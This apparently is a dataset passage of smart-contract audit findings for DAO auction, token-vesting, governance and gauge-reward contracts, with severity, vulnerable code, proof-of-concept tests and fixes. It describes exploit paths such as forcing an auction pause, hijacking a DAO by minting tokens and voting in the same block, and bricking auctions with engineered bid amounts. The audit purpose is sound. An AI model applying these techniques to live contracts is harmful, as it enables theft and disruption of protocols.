\"./utils/mocks/MockPartialTokenImpl.sol\";\\nimport { MockProtocolRewards } from \"./utils/mocks/MockProtocolRewards.sol\";\\nimport { Auction } from \"../src/auction/Auction.sol\";\\nimport { IAuction } from \"../src/auction/IAuction.sol\";\\nimport { AuctionTypesV2 } from \"../src/auction/types/AuctionTypesV2.sol\";\\nimport { TokenTypesV2 } from \"../src/token/types/TokenTypesV2.sol\";\\nimport { Attacker } from \"./Attacker.sol\";\\n\\ncontract AuctionTest is NounsBuilderTest {\\n MockImpl internal mockImpl;\\n Auction internal rewardImpl;\\n Attacker internal attacker;\\n address internal bidder1;\\n address internal bidder2;\\n address internal referral;\\n uint16 internal builderRewardBPS = 300;\\n uint16 internal referralRewardBPS = 400;\\n\\n function setUp() public virtual override {\\n super.setUp();\\n bidder1 = vm.addr(0xB1);\\n bidder2 = vm.addr(0xB2);\\n vm.deal(bidder1, 100 ether);\\n vm.deal(bidder2, 100 ether);\\n mockImpl = new MockImpl();\\n rewardImpl = new Auction(address(manager), address(rewards), weth, builderRewardBPS, referralRewardBPS);\\n attacker = new Attacker();\\n }\\n\\n function test_POC() public {\\n // START OF SETUP\\n address[] memory wallets = new address[](1);\\n uint256[] memory percents = new uint256[](1);\\n uint256[] memory vestingEnds = new uint256[](1);\\n wallets[0] = founder;\\n percents[0] = 99;\\n vestingEnds[0] = 4 weeks;\\n //Setting founder with high percentage ownership.\\n setFounderParams(wallets, percents, vestingEnds);\\n setMockTokenParams();\\n setMockAuctionParams();\\n setMockGovParams();\\n deploy(foundersArr, tokenParams, auctionParams, govParams);\\n setMockMetadata();\\n // END OF SETUP\\n\\n // Start auction contract and do the first auction\\n vm.prank(founder);\\n auction.unpause();\\n vm.prank(bidder1);\\n auction.createBid{ value: 0.420 ether }(99);\\n vm.prank(bidder2);\\n auction.createBid{ value: 1 ether }(99);\\n\\n // Move block.timestamp so auction can end.\\n vm.warp(10 minutes + 1 seconds);\\n\\n //Attacker calls the auction\\n attacker.forcePause(address(auction));\\n\\n //Check that auction was paused.\\n assertEq(auction.paused(), true);\\n }\\n}\\n```\\nчConsider better handling the possible errors from `Token.mint()`, like shown below:\\n```\\n function _createAuction() private returns (bool) {\\n // Get the next token available for bidding\\n try token.mint() returns (uint256 tokenId) {\\n //CODE OMMITED\\n } catch (bytes memory err) {\\n // On production consider pre-calculating the hash values to save gas\\n if (keccak256(abi.encodeWithSignature(\"NO_METADATA_GENERATED()\")) == keccak256(err)) {\\n _pause();\\n return false\\n } else if (keccak256(abi.encodeWithSignature(\"ALREADY_MINTED()\") == keccak256(err)) {\\n _pause();\\n return false\\n } else {\\n revert OUT_OF_GAS();\\n }\\n } \\n```\\nчShould the conditions mentioned above be met, an attacker can arbitrarily pause the auction contract, effectively interrupting the DAO auction process. This pause persists until owners takes subsequent actions to unpause the contract. The attacker can exploit this vulnerability repeatedly.ч```\\nfunction _createAuction() private returns (bool) {\\n // Get the next token available for bidding\\n try token.mint() returns (uint256 tokenId) {\\n // Store the token id\\n auction.tokenId = tokenId;\\n\\n // Cache the current timestamp\\n uint256 startTime = block.timestamp;\\n\\n // Used to store the auction end time\\n uint256 endTime;\\n\\n // Cannot realistically overflow\\n unchecked {\\n // Compute the auction end time\\n endTime = startTime + settings.duration;\\n }\\n\\n // Store the auction start and end time\\n auction.startTime = uint40(startTime);\\n auction.endTime = uint40(endTime);\\n\\n // Reset data from the previous auction\\n auction.highestBid = 0;\\n auction.highestBidder = address(0);\\n auction.settled = false;\\n\\n // Reset referral from the previous auction\\n currentBidReferral = address(0);\\n\\n emit AuctionCreated(tokenId, startTime, endTime);\\n return true;\\n } catch {\\n // Pause the contract if token minting failed\\n _pause();\\n return false;\\n }\\n}\\n```\\n -MerkleReserveMinter minting methodology is incompatible with current governance structure and can lead to migrated DAOs being hijacked immediatelyчmediumчMerkleReserveMinter allows large number of tokens to be minted instantaneously which is incompatible with the current governance structure which relies on tokens being minted individually and time locked after minting by the auction. By minting and creating a proposal in the same block a user is able to create a proposal with significantly lower quorum than expected. This could easily be used to hijack the migrated DAO.\\nMerkleReserveMinter.sol#L154-L167\\n```\\nunchecked {\\n for (uint256 i = 0; i < claimCount; ++i) {\\n // Load claim in memory\\n MerkleClaim memory claim = claims[I];\\n\\n // Requires one proof per tokenId to handle cases where users want to partially claim\\n if (!MerkleProof.verify(claim.merkleProof, settings.merkleRoot, keccak256(abi.encode(claim.mintTo, claim.tokenId)))) {\\n revert INVALID_MERKLE_PROOF(claim.mintTo, claim.merkleProof, settings.merkleRoot);\\n }\\n\\n // Only allowing reserved tokens to be minted for this strategy\\n IToken(tokenContract).mintFromReserveTo(claim.mintTo, claim.tokenId);\\n }\\n}\\n```\\n\\nWhen minting from the claim merkle tree, a user is able to mint as many tokens as they want in a single transaction. This means in a single transaction, the supply of the token can increase very dramatically. Now we'll take a look at the governor contract as to why this is such an issue.\\nGovernor.sol#L184-L192\\n```\\n // Store the proposal data\\n proposal.voteStart = SafeCast.toUint32(snapshot);\\n proposal.voteEnd = SafeCast.toUint32(deadline);\\n proposal.proposalThreshold = SafeCast.toUint32(currentProposalThreshold);\\n proposal.quorumVotes = SafeCast.toUint32(quorum());\\n proposal.proposer = msg.sender;\\n proposal.timeCreated = SafeCast.toUint32(block.timestamp);\\n\\n emit ProposalCreated(proposalId, _targets, _values, _calldatas, _description, descriptionHash, proposal);\\n```\\n\\nGovernor.sol#L495-L499\\n```\\nfunction quorum() public view returns (uint256) {\\n unchecked {\\n return (settings.token.totalSupply() * settings.quorumThresholdBps) / BPS_PER_100_PERCENT;\\n }\\n}\\n```\\n\\nWhen creating a proposal, we see that it uses a snapshot of the CURRENT total supply. This is what leads to the issue. The setup is fairly straightforward and occurs all in a single transaction:\\nCreate a malicious proposal (which snapshots current supply)\\nMint all the tokens\\nVote on malicious proposal with all minted tokens\\nThe reason this works is because the quorum is based on the supply before the mint while votes are considered after the mint, allowing significant manipulation of the quorum.чToken should be changed to use a checkpoint based total supply, similar to how balances are handled. Quorum should be based on that instead of the current supply.чDOA can be completely hijackedч```\\nunchecked {\\n for (uint256 i = 0; i < claimCount; ++i) {\\n // Load claim in memory\\n MerkleClaim memory claim = claims[I];\\n\\n // Requires one proof per tokenId to handle cases where users want to partially claim\\n if (!MerkleProof.verify(claim.merkleProof, settings.merkleRoot, keccak256(abi.encode(claim.mintTo, claim.tokenId)))) {\\n revert INVALID_MERKLE_PROOF(claim.mintTo, claim.merkleProof, settings.merkleRoot);\\n }\\n\\n // Only allowing reserved tokens to be minted for this strategy\\n IToken(tokenContract).mintFromReserveTo(claim.mintTo, claim.tokenId);\\n }\\n}\\n```\\n -when reservedUntilTokenId > 100 first funder loss 1% NFTчhighчThe incorrect use of `baseTokenId = reservedUntilTokenId` may result in the first `tokenRecipient[]` being invalid, thus preventing the founder from obtaining this portion of the NFT.\\nThe current protocol adds a parameter `reservedUntilTokenId` for reserving `Token`. This parameter will be used as the starting `baseTokenId` during initialization.\\n```\\n function _addFounders(IManager.FounderParams[] calldata _founders, uint256 reservedUntilTokenId) internal {\\n// rest of code\\n\\n // Used to store the base token id the founder will recieve\\n uint256 baseTokenId = reservedUntilTokenId;\\n\\n // For each token to vest:\\n for (uint256 j; j < founderPct; ++j) {\\n // Get the available token id\\n baseTokenId = _getNextTokenId(baseTokenId);\\n\\n // Store the founder as the recipient\\n tokenRecipient[baseTokenId] = newFounder;\\n\\n emit MintScheduled(baseTokenId, founderId, newFounder);\\n\\n // Update the base token id\\n baseTokenId = (baseTokenId + schedule) % 100;\\n }\\n }\\n..\\n\\n function _getNextTokenId(uint256 _tokenId) internal view returns (uint256) {\\n unchecked {\\n while (tokenRecipient[_tokenId].wallet != address(0)) {\\n _tokenId = (++_tokenId) % 100;\\n }\\n\\n return _tokenId;\\n }\\n }\\n```\\n\\nBecause `baseTokenId = reservedUntilTokenId` is used, if `reservedUntilTokenId>100`, for example, reservedUntilTokenId=200, the first `_getNextTokenId(200)` will return `baseTokenId=200 , tokenRecipient[200]=newFounder`.\\nExample: reservedUntilTokenId = 200 founder[0].founderPct = 10\\nIn this way, the `tokenRecipient[]` of `founder` will become tokenRecipient[200].wallet = `founder` ( first will call _getNextTokenId(200) return 200) tokenRecipient[10].wallet = `founder` ( second will call _getNextTokenId((200 + 10) %100 = 10) ) tokenRecipient[20].wallet = `founder` ... tokenRecipient[90].wallet = `founder`\\nHowever, this `tokenRecipient[200]` will never be used, because in `_isForFounder()`, it will be modulo, so only `baseTokenId < 100` is valid. In this way, the first founder can actually only `9%` of NFT.\\n```\\n function _isForFounder(uint256 _tokenId) private returns (bool) {\\n // Get the base token id\\n uint256 baseTokenId = _tokenId % 100;\\n\\n // If there is no scheduled recipient:\\n if (tokenRecipient[baseTokenId].wallet == address(0)) {\\n return false;\\n\\n // Else if the founder is still vesting:\\n } else if (block.timestamp < tokenRecipient[baseTokenId].vestExpiry) {\\n // Mint the token to the founder\\n _mint(tokenRecipient[baseTokenId].wallet, _tokenId);\\n\\n return true;\\n\\n // Else the founder has finished vesting:\\n } else {\\n // Remove them from future lookups\\n delete tokenRecipient[baseTokenId];\\n\\n return false;\\n }\\n }\\n```\\n\\nPOC\\nThe following test demonstrates that `tokenRecipient[200]` is for founder.\\nneed change tokenRecipient to public , so can assertEq\\n```\\ncontract TokenStorageV1 is TokenTypesV1 {\\n /// @notice The token settings\\n Settings internal settings;\\n\\n /// @notice The vesting details of a founder\\n /// @dev Founder id => Founder\\n mapping(uint256 => Founder) internal founder;\\n\\n /// @notice The recipient of a token\\n /// @dev ERC// Remove the line below\\n721 token id => Founder\\n// Remove the line below\\n mapping(uint256 => Founder) internal tokenRecipient;\\n// Add the line below\\n mapping(uint256 => Founder) public tokenRecipient;\\n}\\n```\\n\\nadd to `token.t.sol`\\n```\\n function test_lossFirst(address _minter, uint256 _reservedUntilTokenId, uint256 _tokenId) public {\\n deployAltMock(200);\\n (address wallet ,,)= token.tokenRecipient(200);\\n assertEq(wallet,founder);\\n }\\n```\\n\\n```\\n$ forge test -vvv --match-test test_lossFirst\\n\\nRunning 1 test for test/Token.t.sol:TokenTest\\n[PASS] test_lossFirst(address,uint256,uint256) (runs: 256, μ: 3221578, ~: 3221578)\\nTest result: ok. 1 passed; 0 failed; 0 skipped; finished in 355.45ms\\nRan 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)\\n```\\nчA better is that the baseTokenId always starts from 0.\\n```\\n function _addFounders(IManager.FounderParams[] calldata _founders, uint256 reservedUntilTokenId) internal {\\n// rest of code\\n\\n // Used to store the base token id the founder will recieve\\n// Remove the line below\\n uint256 baseTokenId = reservedUntilTokenId;\\n// Add the line below\\n uint256 baseTokenId =0;\\n```\\n\\nor\\nuse `uint256 baseTokenId = reservedUntilTokenId % 100;`\\n```\\n function _addFounders(IManager.FounderParams[] calldata _founders, uint256 reservedUntilTokenId) internal {\\n// rest of code\\n\\n // Used to store the base token id the founder will recieve\\n// Remove the line below\\n uint256 baseTokenId = reservedUntilTokenId;\\n// Add the line below\\n uint256 baseTokenId = reservedUntilTokenId % 100;\\n```\\nчwhen reservedUntilTokenId > 100 first funder loss 1% NFTч```\\n function _addFounders(IManager.FounderParams[] calldata _founders, uint256 reservedUntilTokenId) internal {\\n// rest of code\\n\\n // Used to store the base token id the founder will recieve\\n uint256 baseTokenId = reservedUntilTokenId;\\n\\n // For each token to vest:\\n for (uint256 j; j < founderPct; ++j) {\\n // Get the available token id\\n baseTokenId = _getNextTokenId(baseTokenId);\\n\\n // Store the founder as the recipient\\n tokenRecipient[baseTokenId] = newFounder;\\n\\n emit MintScheduled(baseTokenId, founderId, newFounder);\\n\\n // Update the base token id\\n baseTokenId = (baseTokenId + schedule) % 100;\\n }\\n }\\n..\\n\\n function _getNextTokenId(uint256 _tokenId) internal view returns (uint256) {\\n unchecked {\\n while (tokenRecipient[_tokenId].wallet != address(0)) {\\n _tokenId = (++_tokenId) % 100;\\n }\\n\\n return _tokenId;\\n }\\n }\\n```\\n -Adversary can permanently brick auctions due to precision error in Auction#_computeTotalRewardsчhighчWhen batch depositing to ProtocolRewards, the msg.value is expected to match the sum of the amounts array EXACTLY. The issue is that due to precision loss in Auction#_computeTotalRewards this call can be engineered to always revert which completely bricks the auction process.\\nProtocolRewards.sol#L55-L65\\n```\\n for (uint256 i; i < numRecipients; ) {\\n expectedTotalValue += amounts[i];\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n if (msg.value != expectedTotalValue) {\\n revert INVALID_DEPOSIT();\\n }\\n```\\n\\nWhen making a batch deposit the above method is called. As seen, the call with revert if the sum of amounts does not EXACTLY equal the msg.value.\\nAuction.sol#L474-L507\\n```\\n uint256 totalBPS = _founderRewardBps + referralRewardsBPS + builderRewardsBPS;\\n\\n // rest of code\\n\\n // Calulate total rewards\\n split.totalRewards = (_finalBidAmount * totalBPS) / BPS_PER_100_PERCENT;\\n\\n // rest of code\\n\\n // Initialize arrays\\n split.recipients = new address[](arraySize);\\n split.amounts = new uint256[](arraySize);\\n split.reasons = new bytes4[](arraySize);\\n\\n // Set builder reward\\n split.recipients[0] = builderRecipient;\\n split.amounts[0] = (_finalBidAmount * builderRewardsBPS) / BPS_PER_100_PERCENT;\\n\\n // Set referral reward\\n split.recipients[1] = _currentBidRefferal != address(0) ? _currentBidRefferal : builderRecipient;\\n split.amounts[1] = (_finalBidAmount * referralRewardsBPS) / BPS_PER_100_PERCENT;\\n\\n // Set founder reward if enabled\\n if (hasFounderReward) {\\n split.recipients[2] = founderReward.recipient;\\n split.amounts[2] = (_finalBidAmount * _founderRewardBps) / BPS_PER_100_PERCENT;\\n }\\n```\\n\\nThe sum of the percentages are used to determine the totalRewards. Meanwhile, the amounts are determined using the broken out percentages of each. This leads to unequal precision loss, which can cause totalRewards to be off by a single wei which cause the batch deposit to revert and the auction to be bricked. Take the following example:\\nAssume a referral reward of 5% (500) and a builder reward of 5% (500) for a total of 10% (1000). To brick the contract the adversary can engineer their bid with specific final digits. In this example, take a bid ending in 19.\\n```\\nsplit.totalRewards = (19 * 1,000) / 100,000 = 190,000 / 100,000 = 1\\n\\nsplit.amounts[0] = (19 * 500) / 100,000 = 95,000 / 100,000 = 0\\nsplit.amounts[1] = (19 * 500) / 100,000 = 95,000 / 100,000 = 0\\n```\\n\\nHere we can see that the sum of amounts is not equal to totalRewards and the batch deposit will revert.\\nAuction.sol#L270-L273\\n```\\nif (split.totalRewards != 0) {\\n // Deposit rewards\\n rewardsManager.depositBatch{ value: split.totalRewards }(split.recipients, split.amounts, split.reasons, \"\");\\n}\\n```\\n\\nThe depositBatch call is placed in the very important _settleAuction function. This results in auctions that are permanently broken and can never be settled.чInstead of setting totalRewards with the sum of the percentages, increment it by each fee calculated. This way they will always match no matter what.чAuctions are completely brickedч```\\n for (uint256 i; i < numRecipients; ) {\\n expectedTotalValue += amounts[i];\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n if (msg.value != expectedTotalValue) {\\n revert INVALID_DEPOSIT();\\n }\\n```\\n -Lowering the gauge weight can disrupt accounting, potentially leading to both excessive fund distribution and a loss of funds.чhighчSimilar issues were found by users 0xDetermination and bart1e in the Canto veRWA audit, which uses a similar gauge controller type.\\nWhen the _change_gauge_weight function is called, the `points_weight[addr][next_time].bias` andtime_weight[addr] are updated - the slope is not.\\n```\\ndef _change_gauge_weight(addr: address, weight: uint256):\\n # Change gauge weight\\n # Only needed when testing in reality\\n gauge_type: int128 = self.gauge_types_[addr] - 1\\n old_gauge_weight: uint256 = self._get_weight(addr)\\n type_weight: uint256 = self._get_type_weight(gauge_type)\\n old_sum: uint256 = self._get_sum(gauge_type)\\n _total_weight: uint256 = self._get_total()\\n next_time: uint256 = (block.timestamp + WEEK) / WEEK * WEEK\\n\\n self.points_weight[addr][next_time].bias = weight\\n self.time_weight[addr] = next_time\\n\\n new_sum: uint256 = old_sum + weight - old_gauge_weight\\n self.points_sum[gauge_type][next_time].bias = new_sum\\n self.time_sum[gauge_type] = next_time\\n\\n _total_weight = _total_weight + new_sum * type_weight - old_sum * type_weight\\n self.points_total[next_time] = _total_weight\\n self.time_total = next_time\\n\\n log NewGaugeWeight(addr, block.timestamp, weight, _total_weight)\\n```\\n\\nThe equation f(t) = c - mx represents the gauge's decay equation before the weight is reduced. In this equation, `m` is the slope. After the weight is reduced by an amount `k` using the `change_gauge_weight` function, the equation becomes f(t) = c - `k` - mx The slope `m` remains unchanged, but the t-axis intercept changes from t1 = c/m to t2 = (c-k)/m.\\nSlope adjustments that should be applied to the global slope when decay reaches 0 are stored in the `changes_sum` hashmap. And is not affected by changes in gauge weight. Consequently, there's a time window t1 - t2 during which the earlier slope changes applied to the global state when user called `vote_for_gauge_weights` function remains applied even though they should have been subtracted. This in turn creates a situation in which the global weightis less than the sum of the individual gauge weights, resulting in an accounting error.\\nSo, in the `CvgRewards` contract when the `writeStakingRewards` function invokes the `_checkpoint`, which subsequently triggers the `gauge_relative_weight_writes` function for the relevant time period, the calculated relative weight becomes inflated, leading to an increase in the distributed rewards. If all available rewards are distributed before the entire array is processed, the remaining users will receive no rewards.\"\\nThe issue mainly arises when a gauge's weight has completely diminished to zero. This is certain to happen if a gauge with a non-zero bias, non-zero slope, and a t-intercept exceeding the current time is killed using `kill_gauge` function.\\nAdditionally, decreasing a gauge's weight introduces inaccuracies in its decay equation, as is evident in the t-intercept.чDisable weight reduction, or only allow reset to 0.чThe way rewards are calculated is broken, leading to an uneven distribution of rewards, with some users receiving too much and others receiving nothing.ч```\\ndef _change_gauge_weight(addr: address, weight: uint256):\\n # Change gauge weight\\n # Only needed when testing in reality\\n gauge_type: int128 = self.gauge_types_[addr] - 1\\n old_gauge_weight: uint256 = self._get_weight(addr)\\n type_weight: uint256 = self._get_type_weight(gauge_type)\\n old_sum: uint256 = self._get_sum(gauge_type)\\n _total_weight: uint256 = self._get_total()\\n next_time: uint256 = (block.timestamp + WEEK) / WEEK * WEEK\\n\\n self.points_weight[addr][next_time].bias = weight\\n self.time_weight[addr] = next_time\\n\\n new_sum: uint256 = old_sum + weight - old_gauge_weight\\n self.points_sum[gauge_type][next_time].bias = new_sum\\n self.time_sum[gauge_type] = next_time\\n\\n _total_weight = _total_weight + new_sum * type_weight - old_sum * type_weight\\n self.points_total[next_time] = _total_weight\\n self.time_total = next_time\\n\\n log NewGaugeWeight(addr, block.timestamp, weight, _total_weight)\\n```\\n -Tokens that are both bribes and StakeDao gauge rewards will cause loss of fundsчhighчWhen SdtStakingPositionService is pulling rewards and bribes from buffer, the buffer will return a list of tokens and amounts owed. This list is used to set the rewards eligible for distribution. Since this list is never check for duplicate tokens, a shared bribe and reward token would cause the token to show up twice in the list. The issue it that _sdtRewardsByCycle is set and not incremented which will cause the second occurrence of the token to overwrite the first and break accounting. The amount of token received from the gauge reward that is overwritten will be lost forever.\\nIn L559 of SdtStakingPositionService it receives a list of tokens and amount from the buffer.\\nSdtBuffer.sol#L90-L168\\n```\\n ICommonStruct.TokenAmount[] memory bribeTokens = _sdtBlackHole.pullSdStakingBribes(\\n processor,\\n _processorRewardsPercentage\\n );\\n\\n uint256 rewardAmount = _gaugeAsset.reward_count();\\n\\n ICommonStruct.TokenAmount[] memory tokenAmounts = new ICommonStruct.TokenAmount[](\\n rewardAmount + bribeTokens.length\\n );\\n\\n uint256 counter;\\n address _processor = processor;\\n for (uint256 j; j < rewardAmount; ) {\\n IERC20 token = _gaugeAsset.reward_tokens(j);\\n uint256 balance = token.balanceOf(address(this));\\n if (balance != 0) {\\n uint256 fullBalance = balance;\\n\\n // rest of code\\n\\n token.transfer(sdtRewardsReceiver, balance);\\n\\n **@audit token and amount added from reward_tokens pulled directly from gauge**\\n\\n tokenAmounts[counter++] = ICommonStruct.TokenAmount({token: token, amount: balance});\\n }\\n\\n // rest of code\\n\\n }\\n\\n for (uint256 j; j < bribeTokens.length; ) {\\n IERC20 token = bribeTokens[j].token;\\n uint256 amount = bribeTokens[j].amount;\\n\\n **@audit token and amount added directly with no check for duplicate token**\\n\\n if (amount != 0) {\\n tokenAmounts[counter++] = ICommonStruct.TokenAmount({token: token, amount: amount});\\n\\n // rest of code\\n\\n }\\n```\\n\\nSdtBuffer#pullRewards returns a list of tokens that is a concatenated array of all bribe and reward tokens. There is not controls in place to remove duplicates from this list of tokens. This means that tokens that are both bribes and rewards will be duplicated in the list.\\nSdtStakingPositionService.sol#L561-L577\\n```\\n for (uint256 i; i < _rewardAssets.length; ) {\\n IERC20 _token = _rewardAssets[i].token;\\n uint256 erc20Id = _tokenToId[_token];\\n if (erc20Id == 0) {\\n uint256 _numberOfSdtRewards = ++numberOfSdtRewards;\\n _tokenToId[_token] = _numberOfSdtRewards;\\n erc20Id = _numberOfSdtRewards;\\n }\\n\\n **@audit overwrites and doesn't increment causing duplicates to be lost** \\n\\n _sdtRewardsByCycle[_cvgStakingCycle][erc20Id] = ICommonStruct.TokenAmount({\\n token: _token,\\n amount: _rewardAssets[i].amount\\n });\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n\\nWhen storing this list of rewards, it overwrites _sdtRewardsByCycle with the values from the returned array. This is where the problem arises because duplicates will cause the second entry to overwrite the first entry. Since the first instance is overwritten, all funds in the first occurrence will be lost permanently.чEither sdtBuffer or SdtStakingPositionService should be updated to combine duplicate token entries and prevent overwriting.чTokens that are both bribes and rewards will be cause tokens to be lost foreverч```\\n ICommonStruct.TokenAmount[] memory bribeTokens = _sdtBlackHole.pullSdStakingBribes(\\n processor,\\n _processorRewardsPercentage\\n );\\n\\n uint256 rewardAmount = _gaugeAsset.reward_count();\\n\\n ICommonStruct.TokenAmount[] memory tokenAmounts = new ICommonStruct.TokenAmount[](\\n rewardAmount + bribeTokens.length\\n );\\n\\n uint256 counter;\\n address _processor = processor;\\n for (uint256 j; j < rewardAmount; ) {\\n IERC20 token = _gaugeAsset.reward_tokens(j);\\n uint256 balance = token.balanceOf(address(this));\\n if (balance != 0) {\\n uint256 fullBalance = balance;\\n\\n // rest of code\\n\\n token.transfer(sdtRewardsReceiver, balance);\\n\\n **@audit token and amount added from reward_tokens pulled directly from gauge**\\n\\n tokenAmounts[counter++] = ICommonStruct.TokenAmount({token: token, amount: balance});\\n }\\n\\n // rest of code\\n\\n }\\n\\n for (uint256 j; j < bribeTokens.length; ) {\\n IERC20 token = bribeTokens[j].token;\\n uint256 amount = bribeTokens[j].amount;\\n\\n **@audit token and amount added directly with no check for duplicate token**\\n\\n if (amount != 0) {\\n tokenAmounts[counter++] = ICommonStruct.TokenAmount({token: token, amount: amount});\\n\\n // rest of code\\n\\n }\\n```\\n -Delegation Limitation in Voting Power ManagementчmediumчMgCVG Voting power delegation system is constrained by 2 hard limits, first on the number of tokens delegated to one user (maxTokenIdsDelegated = 25) and second on the number of delegatees for one token ( maxMgDelegatees = 5). Once this limit is reached for a token, the token owner cannot modify the delegation percentage to an existing delegated user. This inflexibility can prevent efficient and dynamic management of delegated voting power.\\nObserve these lines :\\n```\\nfunction delegateMgCvg(uint256 _tokenId, address _to, uint96 _percentage) external onlyTokenOwner(_tokenId) {\\n require(_percentage <= 100, \"INVALID_PERCENTAGE\");\\n\\n uint256 _delegateesLength = delegatedMgCvg[_tokenId].length;\\n require(_delegateesLength < maxMgDelegatees, \"TOO_MUCH_DELEGATEES\");\\n\\n uint256 tokenIdsDelegated = mgCvgDelegatees[_to].length;\\n require(tokenIdsDelegated < maxTokenIdsDelegated, \"TOO_MUCH_MG_TOKEN_ID_DELEGATED\");\\n```\\n\\nif either `maxMgDelegatees` or `maxTokenIdsDelegated` are reached, delegation is no longer possible. The problem is the fact that this function can be either used to delegate or to update percentage of delegation or also to remove a delegation but in cases where we already delegated to a maximum of users (maxMgDelegatees) OR the user to who we delegated has reached the maximum number of tokens that can be delegated to him/her (maxTokenIdsDelegated), an update or a removal of delegation is no longer possible.\\n6 scenarios are possible :\\n`maxTokenIdsDelegated` is set to 5, Alice is the third to delegate her voting power to Bob and choose to delegate 10% to him. Bob gets 2 other people delegating their tokens to him, Alice wants to increase the power delegated to Bob to 50% but she cannot due to Bob reaching `maxTokenIdsDelegated`\\n`maxTokenIdsDelegated` is set to 25, Alice is the 10th to delegate her voting power to Bob and choose to delegate 10%, DAO decrease `maxTokenIdsDelegated` to 3, Alice wants to increase the power delegated to Bob to 50%, but she cannot due to this\\n`maxTokenIdsDelegated` is set to 5, Alice is the third to delegate her voting power to Bob and choose to delegate 90%. Bob gets 2 other people delegating their tokens to him, Alice wants to only remove the power delegated to Bob using this function, but she cannot due to this\\n`maxMgDelegatees` is set to 3, Alice delegates her voting power to Bob,Charly and Donald by 20% each, Alice reaches `maxMgDelegatees` and she cannot update her voting power for any of Bob,Charly or Donald\\n`maxMgDelegatees` is set to 5, Alice delegates her voting power to Bob,Charly and Donald by 20% each,DAO decreasesmaxMgDelegatees to 3. Alice cannot update or remove her voting power delegated to any of Bob,Charly and Donald\\n`maxMgDelegatees` is set to 3, Alice delegates her voting power to Bob,Charly and Donald by 20% each, Alice wants to only remove her delegation to Bob but she reached `maxMgDelegatees` so she cannot only remove her delegation to Bob\\nA function is provided to remove all user to who we delegated but this function cannot be used as a solution to this problem due to 2 things :\\nIt's clearly not intended to do an update of voting power percentage by first removing all delegation we did because `delegateMgCvg()` is clearly defined to allow to delegate OR to remove one delegation OR to update percentage of delegation but in some cases it's impossible which is not acceptable\\nif Alice wants to update it's percentage delegated to Bob , she would have to remove all her delegatees and would take the risk that someone is faster than her and delegate to Bob before her, making Bob reaches `maxTokenIdsDelegated` and would render impossible for Alice to re-delegate to Bob\\nPOC\\nYou can add it to test/ut/delegation/balance-delegation.spec.ts :\\n```\\nit(\"maxTokenIdsDelegated is reached => Cannot update percentage of delegate\", async function () {\\n (await lockingPositionDelegate.maxTokenIdsDelegated()).should.be.equal(25);\\n await lockingPositionDelegate.connect(treasuryDao).setMaxTokenIdsDelegated(3);\\n (await lockingPositionDelegate.maxTokenIdsDelegated()).should.be.equal(3);\\n\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 20);\\n await lockingPositionDelegate.connect(user2).delegateMgCvg(2, user10, 30);\\n await lockingPositionDelegate.connect(user3).delegateMgCvg(3, user10, 30);\\n \\n const txFail = lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 40);\\n await expect(txFail).to.be.revertedWith(\"TOO_MUCH_MG_TOKEN_ID_DELEGATED\");\\n });\\n it(\"maxTokenIdsDelegated IS DECREASED => PERCENTAGE UPDATE IS NO LONGER POSSIBLE\", async function () {\\n await lockingPositionDelegate.connect(treasuryDao).setMaxTokenIdsDelegated(25);\\n (await lockingPositionDelegate.maxTokenIdsDelegated()).should.be.equal(25);\\n\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 20);\\n await lockingPositionDelegate.connect(user2).delegateMgCvg(2, user10, 30);\\n await lockingPositionDelegate.connect(user3).delegateMgCvg(3, user10, 30);\\n\\n await lockingPositionDelegate.connect(treasuryDao).setMaxTokenIdsDelegated(3);\\n (await lockingPositionDelegate.maxTokenIdsDelegated()).should.be.equal(3); \\n\\n const txFail = lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 40);\\n await expect(txFail).to.be.revertedWith(\"TOO_MUCH_MG_TOKEN_ID_DELEGATED\");\\n await lockingPositionDelegate.connect(treasuryDao).setMaxTokenIdsDelegated(25);\\n (await lockingPositionDelegate.maxTokenIdsDelegated()).should.be.equal(25);\\n });\\n it(\"maxMgDelegatees : TRY TO UPDATE PERCENTAGE DELEGATED TO A USER IF WE ALREADY REACH maxMgDelegatees\", async function () {\\n await lockingPositionDelegate.connect(treasuryDao).setMaxMgDelegatees(3);\\n (await lockingPositionDelegate.maxMgDelegatees()).should.be.equal(3);\\n\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 20);\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user2, 30);\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user3, 30);\\n\\n const txFail = lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 40);\\n await expect(txFail).to.be.revertedWith(\"TOO_MUCH_DELEGATEES\");\\n });\\n it(\"maxMgDelegatees : maxMgDelegatees IS DECREASED => PERCENTAGE UPDATE IS NO LONGER POSSIBLE\", async function () {\\n await lockingPositionDelegate.connect(treasuryDao).setMaxMgDelegatees(5);\\n (await lockingPositionDelegate.maxMgDelegatees()).should.be.equal(5);\\n\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user10, 20);\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user2, 30);\\n await lockingPositionDelegate.connect(user1).delegateMgCvg(1, user3, 10);\\n\\n await lockingPositionDelegate.connect(treasuryDao).setMaxMgDelegatees(2);\\n (await lockingPositionDelegate.maxMgDelegatees()).should.be.equal(2);\\n\\n const txFail2 = lockingPositionDelegate.connect(user1).delegateMgCvg(1, user2, 50);\\n await expect(txFail2).to.be.revertedWith(\"TOO_MUCH_DELEGATEES\");\\n });\\n```\\nчIssue Delegation Limitation in Voting Power Management\\nSeparate functions for new delegations and updates : Implement logic that differentiates between adding a new delegatee and updating an existing delegation to allow updates to existing delegations even if the maximum number of delegatees is reachedчIn some cases it is impossible to update percentage delegated or to remove only one delegated percentage then forcing users to remove all their voting power delegatations, taking the risk that someone is faster then them to delegate to their old delegated users and reach threshold for delegation, making impossible for them to re-delegateч```\\nfunction delegateMgCvg(uint256 _tokenId, address _to, uint96 _percentage) external onlyTokenOwner(_tokenId) {\\n require(_percentage <= 100, \"INVALID_PERCENTAGE\");\\n\\n uint256 _delegateesLength = delegatedMgCvg[_tokenId].length;\\n require(_delegateesLength < maxMgDelegatees, \"TOO_MUCH_DELEGATEES\");\\n\\n uint256 